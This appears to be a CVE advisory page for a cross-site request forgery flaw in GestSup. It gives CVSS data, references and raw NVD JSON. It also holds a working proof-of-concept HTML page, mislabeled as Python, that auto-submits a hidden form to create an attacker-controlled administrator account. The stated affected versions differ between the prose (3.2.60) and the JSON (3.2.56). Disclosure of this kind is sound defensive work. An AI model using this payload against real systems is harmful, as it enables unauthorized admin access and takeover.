CVE-2026-22194

Description

GestSup versions up to and including 3.2.60 contain a cross-site request forgery (CSRF) vulnerability where the application does not verify the authenticity of client requests. An attacker can induce a logged-in user to submit crafted requests that perform actions with the victim's privileges. This can be exploited to create privileged accounts by targeting the administrative user creation endpoint.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:* - VULNERABLE

GestSup <= 3.2.60

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<html> <body> <h1>GestSup CSRF Exploit - Create Admin Account</h1> <p>This page will create a new admin account on GestSup.</p> <form action="http://target-gestsup.com/admin/user/add" method="POST" id="csrf-form"> <input type="hidden" name="username" value="attacker_admin"> <input type="hidden" name="password" value="P@ssw0rd123"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="role" value="admin"> <input type="hidden" name="active" value="1"> <input type="hidden" name="submit" value="Create"> </form> <script> // Auto-submit the form when page loads document.getElementById('csrf-form').submit(); </script> <p>If you see this message, the exploit may have failed.</p> </body> </html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22194
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22194
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22194/
[4] VulDB https://vuldb.com/cve/CVE-2026-22194
[5] https://gestsup.fr/index.php?page=changelog
[6] https://www.vulncheck.com/advisories/gestsup-csrf-allows-privileged-actions

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22194", "sourceIdentifier": "[email protected]", "published": "2026-01-09T17:15:54.750", "lastModified": "2026-01-14T19:22:40.133", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GestSup versions up to and including 3.2.60 contain a cross-site request forgery (CSRF) vulnerability where the application does not verify the authenticity of client requests. An attacker can induce a logged-in user to submit crafted requests that perform actions with the victim's privileges. This can be exploited to create privileged accounts by targeting the administrative user creation endpoint."}, {"lang": "es", "value": "Las versiones de GestSup hasta la 3.2.60 inclusive contienen una vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) donde la aplicación no verifica la autenticidad de las peticiones del cliente. Un atacante puede inducir a un usuario autenticado a enviar peticiones manipuladas que realizan acciones con los privilegios de la víctima. Esto puede ser explotado para crear cuentas privilegiadas al atacar el punto final de creación de usuarios administrativos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:L/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2.56", "matchCriteriaId": "42882370-536F-4C20-B766-1729C16A0021"}]}]}], "references": [{"url": "https://gestsup.fr/index.php?page=changelog", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/gestsup-csrf-allows-privileged-actions", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}